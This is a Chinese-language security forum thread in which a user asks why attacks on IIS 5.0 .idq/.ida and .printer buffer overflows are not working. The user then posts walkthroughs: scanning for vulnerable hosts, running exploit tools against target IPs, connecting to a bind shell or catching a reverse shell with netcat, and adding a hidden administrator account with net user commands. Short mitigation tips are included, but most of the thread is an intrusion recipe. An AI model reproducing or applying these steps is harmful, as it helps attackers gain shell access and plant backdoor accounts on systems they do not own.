|
作者: aa11 [aa11] 论坛用户 | 登录 |
[IIS漏洞] 可能存在"IIS 5.0 .printer远程缓冲区溢出"漏洞 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.ida) 可能存在"IIS Index Server ISAPI扩展远程溢出"漏洞(/NULL.idq) 该怎么利用啊? 用了SNAKE的IIS溢出工具, 显示发送成功~ 但却TELNET不上去啊~~ 这是怎么回事啊?? |
地主 发表时间: 03/04 04:39 |
回复: laievf [laievf] 论坛用户 | 登录 |
http://www.isyubin.com/ychtml/ycwin2kld.htm 看下面的那些 |
B1层 发表时间: 03/04 07:00 |
回复: aa11 [aa11] 论坛用户 | 登录 |
*.idq漏洞: IIS 在处理以".ida"为扩展名的URL请求时,它会有两种结果。 一个可能的结果是服务器回复"URL String too long"的信息;或类似"Cannot find the specified path" 的信息。另一种可能就是服务器端服务停止,并返回"Access Violation"信息(即成功的实现了对服务器端的拒绝服务攻击。 用流光扫IP,找存在*.idq漏洞的机器,例如IP:202.1.1.3存在此漏洞。 这里使用snake的IIS溢出工具。 IISMiscOverflowV1_Build0010是其中图形界面的工具,在被攻击地址上填202.1.1.3,端口:80,操作系统类型选:IIS5中文win2kSp0,绑定端口813,然后按IDQ溢出。发送成功。 在cmd下输入: c:\>nc �Cvv 202.1.1.3 813 202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [202.1.1.3] 813 (?): connection refused sent 0, rcvd 0: NOTSOCK 没成功,我们换IIS5中文win2kSp1或win2kSp2再试试。然后同样的再输入: c:\>nc �Cvv 202.1.1.3 813 202.1.1.3: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [202.1.1.3] 813 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32> 这样就成功了。大多数情况下,站点很少使用扩展名为".ida"和".idq"的文件,可在ISAPI脚本映射中,将扩展名为".ida"和".idq"的应用程序映射删除。 *.printer漏洞: 我也是这么做的, 但却没有成功??? WHY~~~~~~~~ |
B2层 发表时间: 03/04 23:05 |
回复: aa11 [aa11] 论坛用户 | 登录 |
微软Win 2K IIS 5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS 5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。 同样的,用流光扫一个存在*.printer漏洞的机器,IP:202.1.1.4 这里使用小榕的IIS5Exploit。 IIS5 .Printer Exploit 使用说明: 本程序适用于英文版IIS 5.0 1、首先在本机用NC开一个监听端口。 C:\>nc -l -p 99 2、运行IIS5Exploit D:\>IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.1 99 ===========IIS5 English Version .Printer Exploit.=========== ===Written by Assassin 1995-2001. http://www.netXeyes.com=== Connecting 211.152.188.1 ...OK. Send Shell Code ...OK IIS5 Shell Code Send OK 其中211.152.188.1指向本地IP。 稍等片刻,如果成功在本机NC舰艇的端口出现: C:\>nc -l -p 99 Microsoft Windows 2000[Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\> 可以执行命令。如: C:\>net user hack password /add The command completed successfully. C:\>net localgroup administrartors hack /add 这样就创建了一个属于Administrator组的用户Hack,密码为password.。 要解决此漏洞有两种方法1. 删除.printer扩展 2. 安装微软提供的补丁 我是这样做的啊~~ |
B3层 发表时间: 03/04 23:07 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号